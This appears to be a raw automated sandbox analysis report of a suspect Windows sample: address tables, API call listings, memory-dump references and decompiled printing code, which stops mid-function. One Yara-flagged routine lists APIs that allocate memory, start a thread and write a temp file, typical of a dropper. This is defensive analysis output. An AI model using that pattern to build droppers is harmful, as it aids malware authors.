                                                                                                                                                                                                                                                                                          0x00100b71
                                                                                                                                                                                                                                                                                          0x00100b75
                                                                                                                                                                                                                                                                                          0x00100b80
                                                                                                                                                                                                                                                                                          0x00100b82
                                                                                                                                                                                                                                                                                          0x00100b88
                                                                                                                                                                                                                                                                                          0x00100b8c
                                                                                                                                                                                                                                                                                          0x00100b99
                                                                                                                                                                                                                                                                                          0x00100ba6
                                                                                                                                                                                                                                                                                          0x00100ba6
                                                                                                                                                                                                                                                                                          0x00100bac
                                                                                                                                                                                                                                                                                          0x00100bac
                                                                                                                                                                                                                                                                                          0x00100bb2
                                                                                                                                                                                                                                                                                          0x00100bc3
                                                                                                                                                                                                                                                                                          0x00100bcb
                                                                                                                                                                                                                                                                                          0x00100bcf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100bd1
                                                                                                                                                                                                                                                                                          0x00100bd7
                                                                                                                                                                                                                                                                                          0x00100be1
                                                                                                                                                                                                                                                                                          0x00100beb
                                                                                                                                                                                                                                                                                          0x00100bf6
                                                                                                                                                                                                                                                                                          0x00100c06
                                                                                                                                                                                                                                                                                          0x00100c06
                                                                                                                                                                                                                                                                                          0x00100bf6
                                                                                                                                                                                                                                                                                          0x00100be1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100bcf
                                                                                                                                                                                                                                                                                          0x00100bd5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100bd5
                                                                                                                                                                                                                                                                                          0x00100b53
                                                                                                                                                                                                                                                                                          0x00100c08
                                                                                                                                                                                                                                                                                          0x00100c0a
                                                                                                                                                                                                                                                                                          0x00100c10
                                                                                                                                                                                                                                                                                          0x00100c3c
                                                                                                                                                                                                                                                                                          0x00100c44
                                                                                                                                                                                                                                                                                          0x00100c12
                                                                                                                                                                                                                                                                                          0x00100c12
                                                                                                                                                                                                                                                                                          0x00100c18
                                                                                                                                                                                                                                                                                          0x00100c1e
                                                                                                                                                                                                                                                                                          0x00100c21
                                                                                                                                                                                                                                                                                          0x00100c25
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100c27
                                                                                                                                                                                                                                                                                          0x00100c27
                                                                                                                                                                                                                                                                                          0x00100c30
                                                                                                                                                                                                                                                                                          0x00100c34
                                                                                                                                                                                                                                                                                          0x00100c35
                                                                                                                                                                                                                                                                                          0x00100c3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100c3a
                                                                                                                                                                                                                                                                                          0x00100c4a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100c4c
                                                                                                                                                                                                                                                                                          0x00100c4e
                                                                                                                                                                                                                                                                                          0x00100c89
                                                                                                                                                                                                                                                                                          0x00100c8f
                                                                                                                                                                                                                                                                                          0x00100c91
                                                                                                                                                                                                                                                                                          0x00100c96
                                                                                                                                                                                                                                                                                          0x00100c9d
                                                                                                                                                                                                                                                                                          0x00100ca0
                                                                                                                                                                                                                                                                                          0x00100ca9
                                                                                                                                                                                                                                                                                          0x00100caa
                                                                                                                                                                                                                                                                                          0x00100cad
                                                                                                                                                                                                                                                                                          0x00100cb0
                                                                                                                                                                                                                                                                                          0x00100cb3
                                                                                                                                                                                                                                                                                          0x00100cba
                                                                                                                                                                                                                                                                                          0x00100cc6
                                                                                                                                                                                                                                                                                          0x00100cd4
                                                                                                                                                                                                                                                                                          0x00100cdd
                                                                                                                                                                                                                                                                                          0x00100ce0
                                                                                                                                                                                                                                                                                          0x00100cf2
                                                                                                                                                                                                                                                                                          0x00100d00
                                                                                                                                                                                                                                                                                          0x00100d03
                                                                                                                                                                                                                                                                                          0x00100d06
                                                                                                                                                                                                                                                                                          0x00100d09
                                                                                                                                                                                                                                                                                          0x00100d0f
                                                                                                                                                                                                                                                                                          0x00100d15
                                                                                                                                                                                                                                                                                          0x00100d1d
                                                                                                                                                                                                                                                                                          0x00100d24
                                                                                                                                                                                                                                                                                          0x00100d27
                                                                                                                                                                                                                                                                                          0x00100d38
                                                                                                                                                                                                                                                                                          0x00100d43
                                                                                                                                                                                                                                                                                          0x00100d46
                                                                                                                                                                                                                                                                                          0x00100d49
                                                                                                                                                                                                                                                                                          0x00100d4c
                                                                                                                                                                                                                                                                                          0x00100d4f
                                                                                                                                                                                                                                                                                          0x00100d52
                                                                                                                                                                                                                                                                                          0x00100d54
                                                                                                                                                                                                                                                                                          0x00100d5a
                                                                                                                                                                                                                                                                                          0x00100d66
                                                                                                                                                                                                                                                                                          0x00100d6c
                                                                                                                                                                                                                                                                                          0x00100d6e
                                                                                                                                                                                                                                                                                          0x00100d7d
                                                                                                                                                                                                                                                                                          0x00100d86
                                                                                                                                                                                                                                                                                          0x00100d9c
                                                                                                                                                                                                                                                                                          0x00100d88
                                                                                                                                                                                                                                                                                          0x00100d8e
                                                                                                                                                                                                                                                                                          0x00100d95
                                                                                                                                                                                                                                                                                          0x00100d95
                                                                                                                                                                                                                                                                                          0x00100db1
                                                                                                                                                                                                                                                                                          0x00100dc2
                                                                                                                                                                                                                                                                                          0x00100dc4
                                                                                                                                                                                                                                                                                          0x00100dcf
                                                                                                                                                                                                                                                                                          0x00100ddb
                                                                                                                                                                                                                                                                                          0x00100ddb
                                                                                                                                                                                                                                                                                          0x00100ddd
                                                                                                                                                                                                                                                                                          0x00100de0
                                                                                                                                                                                                                                                                                          0x00100df3
                                                                                                                                                                                                                                                                                          0x00100df6
                                                                                                                                                                                                                                                                                          0x00100df9
                                                                                                                                                                                                                                                                                          0x00100dfc
                                                                                                                                                                                                                                                                                          0x00100dff
                                                                                                                                                                                                                                                                                          0x00100e02
                                                                                                                                                                                                                                                                                          0x00100e05
                                                                                                                                                                                                                                                                                          0x00100e0d
                                                                                                                                                                                                                                                                                          0x00100e1b
                                                                                                                                                                                                                                                                                          0x00100e20
                                                                                                                                                                                                                                                                                          0x00100e23
                                                                                                                                                                                                                                                                                          0x00100e31
                                                                                                                                                                                                                                                                                          0x00100e43
                                                                                                                                                                                                                                                                                          0x00100e47
                                                                                                                                                                                                                                                                                          0x00100e47
                                                                                                                                                                                                                                                                                          0x00100e31
                                                                                                                                                                                                                                                                                          0x00100e49
                                                                                                                                                                                                                                                                                          0x00100e52
                                                                                                                                                                                                                                                                                          0x00100eea
                                                                                                                                                                                                                                                                                          0x00100ef8
                                                                                                                                                                                                                                                                                          0x00100f38
                                                                                                                                                                                                                                                                                          0x00100f47
                                                                                                                                                                                                                                                                                          0x00100f4c
                                                                                                                                                                                                                                                                                          0x00100f4f
                                                                                                                                                                                                                                                                                          0x00100f58
                                                                                                                                                                                                                                                                                          0x00100efa
                                                                                                                                                                                                                                                                                          0x00100efa
                                                                                                                                                                                                                                                                                          0x00100f02
                                                                                                                                                                                                                                                                                          0x00100f0a
                                                                                                                                                                                                                                                                                          0x00100f0a
                                                                                                                                                                                                                                                                                          0x00100f12
                                                                                                                                                                                                                                                                                          0x00100f17
                                                                                                                                                                                                                                                                                          0x00100f18
                                                                                                                                                                                                                                                                                          0x00100f26
                                                                                                                                                                                                                                                                                          0x00100f26
                                                                                                                                                                                                                                                                                          0x00100e58
                                                                                                                                                                                                                                                                                          0x00100e5f
                                                                                                                                                                                                                                                                                          0x00100e61
                                                                                                                                                                                                                                                                                          0x00100e67
                                                                                                                                                                                                                                                                                          0x00100e6b
                                                                                                                                                                                                                                                                                          0x00100e78
                                                                                                                                                                                                                                                                                          0x00100e85
                                                                                                                                                                                                                                                                                          0x00100e85
                                                                                                                                                                                                                                                                                          0x00100e8b
                                                                                                                                                                                                                                                                                          0x00100e8b
                                                                                                                                                                                                                                                                                          0x00100e98
                                                                                                                                                                                                                                                                                          0x00100e9e
                                                                                                                                                                                                                                                                                          0x00100eac
                                                                                                                                                                                                                                                                                          0x00100eb8
                                                                                                                                                                                                                                                                                          0x00100ed0
                                                                                                                                                                                                                                                                                          0x00100ed0
                                                                                                                                                                                                                                                                                          0x00100ed2
                                                                                                                                                                                                                                                                                          0x00100ed8
                                                                                                                                                                                                                                                                                          0x00100ed9
                                                                                                                                                                                                                                                                                          0x00100ee7
                                                                                                                                                                                                                                                                                          0x00100ee7
                                                                                                                                                                                                                                                                                          0x00100c54
                                                                                                                                                                                                                                                                                          0x00100c57
                                                                                                                                                                                                                                                                                          0x00100c5c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00100c5e
                                                                                                                                                                                                                                                                                          0x00100c7b
                                                                                                                                                                                                                                                                                          0x00100c7b
                                                                                                                                                                                                                                                                                          0x00100c5c
                                                                                                                                                                                                                                                                                          0x00100c4e
                                                                                                                                                                                                                                                                                          0x00100c4a
                                                                                                                                                                                                                                                                                          0x00100c25
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(001719AC), ref: 00100B21
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00100B35
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(001719AC), ref: 00100B41
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(001719AC), ref: 00100B8C
                                                                                                                                                                                                                                                                                          • RegisterWindowMessageA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00100BA0
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(001719AC), ref: 00100BAC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000000,?,00000000), ref: 00100BC0
                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 00100BC5
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00100BD7
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 00100BEE
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000037F,00000000,?), ref: 00100C06
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00100C12
                                                                                                                                                                                                                                                                                          • CallNextHookEx.USER32 ref: 00100C6D
                                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00100C89
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalMessageSection$Window$CurrentEnterLeaveRegisterSend$CallExceptionHookNextParentProcessRaiseThread
                                                                                                                                                                                                                                                                                          • String ID: WTL_CmdBar_InternalGetBarMsg
                                                                                                                                                                                                                                                                                          • API String ID: 2745667198-1327875102
                                                                                                                                                                                                                                                                                          • Opcode ID: 001edbf442f06ae5a05c090b7855a1ccfd2af5d2e631ce8cf775fd527e7bfd30
                                                                                                                                                                                                                                                                                          • Instruction ID: edc7dd8785f0e1d06a7478cb14ab7801ac6b4e868d7fe1c5267f1badbd3719bb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 001edbf442f06ae5a05c090b7855a1ccfd2af5d2e631ce8cf775fd527e7bfd30
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F41D335901305AFEB26CF18DD84BAAB3B4FB4D315F108258F99993690C7B0ADC5CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 02528590
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02528598
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 02528626
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0252867C
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 025286A4
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02528741
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,040077B0,?,00000000,00000000), ref: 025287AA
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 025287B7
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(0400C634,?,00000104), ref: 025287EF
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 02528820
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 0252883E
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0252885A
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 025288C8
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 02528924
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0252894A
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 02528970
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 02528983
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickVariable
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 361425215-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4bd7cc2a04e5fe1269c320f0046daf0fa0d4ab140fb1e02ab59e474c4db78636
                                                                                                                                                                                                                                                                                          • Instruction ID: 938d8ffc0d5a87670d0171b0e312e8155041c0d19ce0557eb6ee7c257083dc58
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bd7cc2a04e5fe1269c320f0046daf0fa0d4ab140fb1e02ab59e474c4db78636
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F1EB75A00218EFDB18DF94C989F9DB7B5BB88300F248198E509AB3D0D775AE85CF64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E000F8C30(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v48;
                                                                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                                                                          				int _v56;
                                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                                                                                          				int _v68;
                                                                                                                                                                                                                                                                                          				signed int _v72;
                                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				int _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                                          				int _v96;
                                                                                                                                                                                                                                                                                          				int _v100;
                                                                                                                                                                                                                                                                                          				int _v104;
                                                                                                                                                                                                                                                                                          				int _v108;
                                                                                                                                                                                                                                                                                          				int _v112;
                                                                                                                                                                                                                                                                                          				signed int _v116;
                                                                                                                                                                                                                                                                                          				long _v120;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				int _v148;
                                                                                                                                                                                                                                                                                          				char _v156;
                                                                                                                                                                                                                                                                                          				signed int _v164;
                                                                                                                                                                                                                                                                                          				intOrPtr _v236;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v260;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                                                                                                          				intOrPtr _t145;
                                                                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                                                                          				int _t152;
                                                                                                                                                                                                                                                                                          				signed int _t162;
                                                                                                                                                                                                                                                                                          				signed int _t164;
                                                                                                                                                                                                                                                                                          				signed int _t165;
                                                                                                                                                                                                                                                                                          				signed int _t172;
                                                                                                                                                                                                                                                                                          				int _t180;
                                                                                                                                                                                                                                                                                          				int _t186;
                                                                                                                                                                                                                                                                                          				signed int _t191;
                                                                                                                                                                                                                                                                                          				signed int _t193;
                                                                                                                                                                                                                                                                                          				signed int _t195;
                                                                                                                                                                                                                                                                                          				long _t197;
                                                                                                                                                                                                                                                                                          				int _t201;
                                                                                                                                                                                                                                                                                          				signed int _t204;
                                                                                                                                                                                                                                                                                          				signed int _t207;
                                                                                                                                                                                                                                                                                          				signed int _t211;
                                                                                                                                                                                                                                                                                          				void* _t225;
                                                                                                                                                                                                                                                                                          				void* _t229;
                                                                                                                                                                                                                                                                                          				void* _t232;
                                                                                                                                                                                                                                                                                          				void* _t233;
                                                                                                                                                                                                                                                                                          				int _t239;
                                                                                                                                                                                                                                                                                          				int _t257;
                                                                                                                                                                                                                                                                                          				int* _t278;
                                                                                                                                                                                                                                                                                          				void* _t283;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t284;
                                                                                                                                                                                                                                                                                          				void* _t285;
                                                                                                                                                                                                                                                                                          				void* _t286;
                                                                                                                                                                                                                                                                                          				void* _t287;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t289;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t291;
                                                                                                                                                                                                                                                                                          				void* _t293;
                                                                                                                                                                                                                                                                                          				void* _t295;
                                                                                                                                                                                                                                                                                          				void* _t296;
                                                                                                                                                                                                                                                                                          				signed int _t298;
                                                                                                                                                                                                                                                                                          				signed int _t299;
                                                                                                                                                                                                                                                                                          				signed int _t301;
                                                                                                                                                                                                                                                                                          				void* _t302;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t301 = (_t299 & 0xfffffff8) - 0x5c;
                                                                                                                                                                                                                                                                                          				_t143 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t143 ^ _t301;
                                                                                                                                                                                                                                                                                          				_t145 = _a4;
                                                                                                                                                                                                                                                                                          				_t289 = _a8;
                                                                                                                                                                                                                                                                                          				_t283 = __ecx;
                                                                                                                                                                                                                                                                                          				_v76 = _t145;
                                                                                                                                                                                                                                                                                          				if(_t145 <  *((intOrPtr*)(__ecx + 0x4fc))) {
                                                                                                                                                                                                                                                                                          					_v88 = GetDeviceCaps(_t289, 0x6f);
                                                                                                                                                                                                                                                                                          					_v100 = GetDeviceCaps(_t289, 0x6e);
                                                                                                                                                                                                                                                                                          					_t148 = GetDeviceCaps(_t289, 0x58);
                                                                                                                                                                                                                                                                                          					_t225 = MulDiv;
                                                                                                                                                                                                                                                                                          					_v108 = MulDiv(_v108, 0x5a0, _t148);
                                                                                                                                                                                                                                                                                          					_t152 = MulDiv(_v112, 0x5a0, GetDeviceCaps(_t289, 0x5a));
                                                                                                                                                                                                                                                                                          					_v112 = _t152;
                                                                                                                                                                                                                                                                                          					_v44 = _t152;
                                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                                          					_v52 = 0;
                                                                                                                                                                                                                                                                                          					_v48 = _v116;
                                                                                                                                                                                                                                                                                          					_v56 = _v56 + MulDiv( *(_t283 + 0x4e0), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v48 = _v48 - MulDiv( *(_t283 + 0x4e8), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v52 = _v52 + MulDiv( *(_t283 + 0x4e4), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_t239 = _v44 - MulDiv( *(_t283 + 0x4ec), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          					_v92 = _v52;
                                                                                                                                                                                                                                                                                          					_v80 = 0;
                                                                                                                                                                                                                                                                                          					_v76 = 0;
                                                                                                                                                                                                                                                                                          					_v72 = _v116;
                                                                                                                                                                                                                                                                                          					_t162 = _v108;
                                                                                                                                                                                                                                                                                          					_v44 = _t239;
                                                                                                                                                                                                                                                                                          					_v96 = _v56;
                                                                                                                                                                                                                                                                                          					_t270 = _v48;
                                                                                                                                                                                                                                                                                          					_v84 = _t239;
                                                                                                                                                                                                                                                                                          					_v104 = _t289;
                                                                                                                                                                                                                                                                                          					_v100 = _t289;
                                                                                                                                                                                                                                                                                          					_v88 = _v48;
                                                                                                                                                                                                                                                                                          					_v68 = _v112;
                                                                                                                                                                                                                                                                                          					_v64 = 0;
                                                                                                                                                                                                                                                                                          					_v60 = 0xffffffff;
                                                                                                                                                                                                                                                                                          					__eflags = _t162;
                                                                                                                                                                                                                                                                                          					if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                                          						RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						_t298 = _t301;
                                                                                                                                                                                                                                                                                          						_push(0xffffffff);
                                                                                                                                                                                                                                                                                          						_push(E0010F718);
                                                                                                                                                                                                                                                                                          						_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          						_t302 = _t301 - 0x68;
                                                                                                                                                                                                                                                                                          						_t164 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          						_t165 = _t164 ^ _t298;
                                                                                                                                                                                                                                                                                          						_v164 = _t165;
                                                                                                                                                                                                                                                                                          						_push(_t225);
                                                                                                                                                                                                                                                                                          						_push(_t289);
                                                                                                                                                                                                                                                                                          						_push(_t283);
                                                                                                                                                                                                                                                                                          						_push(_t165);
                                                                                                                                                                                                                                                                                          						 *[fs:0x0] =  &_v156;
                                                                                                                                                                                                                                                                                          						_t167 = _v136;
                                                                                                                                                                                                                                                                                          						_v236 = _v136;
                                                                                                                                                                                                                                                                                          						_t284 = E000FC830(__eflags, _v136 + 0x4b8,  *((intOrPtr*)(_t167 + 0x4c0)));
                                                                                                                                                                                                                                                                                          						_v260 = _t284;
                                                                                                                                                                                                                                                                                          						_v148 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = _t284;
                                                                                                                                                                                                                                                                                          						if(_t284 != 0) {
                                                                                                                                                                                                                                                                                          							_v104 = GetDeviceCaps(_t284, 0x6f);
                                                                                                                                                                                                                                                                                          							_v108 = GetDeviceCaps(_t284, 0x6e);
                                                                                                                                                                                                                                                                                          							_t172 = GetDeviceCaps(_t284, 0x70);
                                                                                                                                                                                                                                                                                          							SetViewportOrgEx(_t284,  ~_t172,  ~(GetDeviceCaps(_t284, 0x71)), 0);
                                                                                                                                                                                                                                                                                          							_v108 = MulDiv(_v108, 0x5a0, GetDeviceCaps(_t284, 0x58));
                                                                                                                                                                                                                                                                                          							_t180 = MulDiv(_v104, 0x5a0, GetDeviceCaps(_t284, 0x5a));
                                                                                                                                                                                                                                                                                          							_t291 = _v100;
                                                                                                                                                                                                                                                                                          							_v104 = _t180;
                                                                                                                                                                                                                                                                                          							_v84 = _t180;
                                                                                                                                                                                                                                                                                          							_v96 = 0;
                                                                                                                                                                                                                                                                                          							_v92 = 0;
                                                                                                                                                                                                                                                                                          							_v88 = _v108;
                                                                                                                                                                                                                                                                                          							_v96 = MulDiv( *(_t291 + 0x514), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          							_v88 = _v88 - MulDiv( *(_t291 + 0x51c), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          							_v92 = _v92 + MulDiv( *(_t291 + 0x518), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          							_t186 = MulDiv( *(_t291 + 0x520), 0x5a0, 0x3e8);
                                                                                                                                                                                                                                                                                          							_v68 = _v96;
                                                                                                                                                                                                                                                                                          							_v76 = _t284;
                                                                                                                                                                                                                                                                                          							_v72 = _t284;
                                                                                                                                                                                                                                                                                          							_v64 = _v92;
                                                                                                                                                                                                                                                                                          							_v60 = _v88;
                                                                                                                                                                                                                                                                                          							_v56 = _v84 - _t186;
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          							_v44 = _v108;
                                                                                                                                                                                                                                                                                          							_v40 = _v104;
                                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                                          							_v32 = 0xffffffff;
                                                                                                                                                                                                                                                                                          							_v120 = SendMessageA( *(_t291 + 0x254), 0xe, 0, 0);
                                                                                                                                                                                                                                                                                          							_t191 =  *(_t291 + 0x52c);
                                                                                                                                                                                                                                                                                          							__eflags = _t191;
                                                                                                                                                                                                                                                                                          							if(_t191 != 0) {
                                                                                                                                                                                                                                                                                          								E00105DE2(_t191);
                                                                                                                                                                                                                                                                                          								_t302 = _t302 + 4;
                                                                                                                                                                                                                                                                                          								 *(_t291 + 0x52c) = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *(_t291 + 0x530) = 0;
                                                                                                                                                                                                                                                                                          							 *(_t291 + 0x534) = 0;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								_t193 =  *(_t291 + 0x534);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t291 + 0x530) - _t193;
                                                                                                                                                                                                                                                                                          								if( *(_t291 + 0x530) != _t193) {
                                                                                                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                                                                                                          									_t195 =  *(_t291 + 0x52c) +  *(_t291 + 0x530) * 4;
                                                                                                                                                                                                                                                                                          									__eflags = _t195;
                                                                                                                                                                                                                                                                                          									if(_t195 != 0) {
                                                                                                                                                                                                                                                                                          										 *_t195 = _v36;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t130 = _t291 + 0x530;
                                                                                                                                                                                                                                                                                          									 *_t130 =  *(_t291 + 0x530) + 1;
                                                                                                                                                                                                                                                                                          									__eflags =  *_t130;
                                                                                                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t257 =  *(_t291 + 0x52c);
                                                                                                                                                                                                                                                                                          									_t278 =  &_v36;
                                                                                                                                                                                                                                                                                          									__eflags = _t278 - _t257;
                                                                                                                                                                                                                                                                                          									if(_t278 < _t257) {
                                                                                                                                                                                                                                                                                          										L14:
                                                                                                                                                                                                                                                                                          										__eflags = _t193;
                                                                                                                                                                                                                                                                                          										if(_t193 != 0) {
                                                                                                                                                                                                                                                                                          											_t204 =  *(_t291 + 0x530) +  *(_t291 + 0x530);
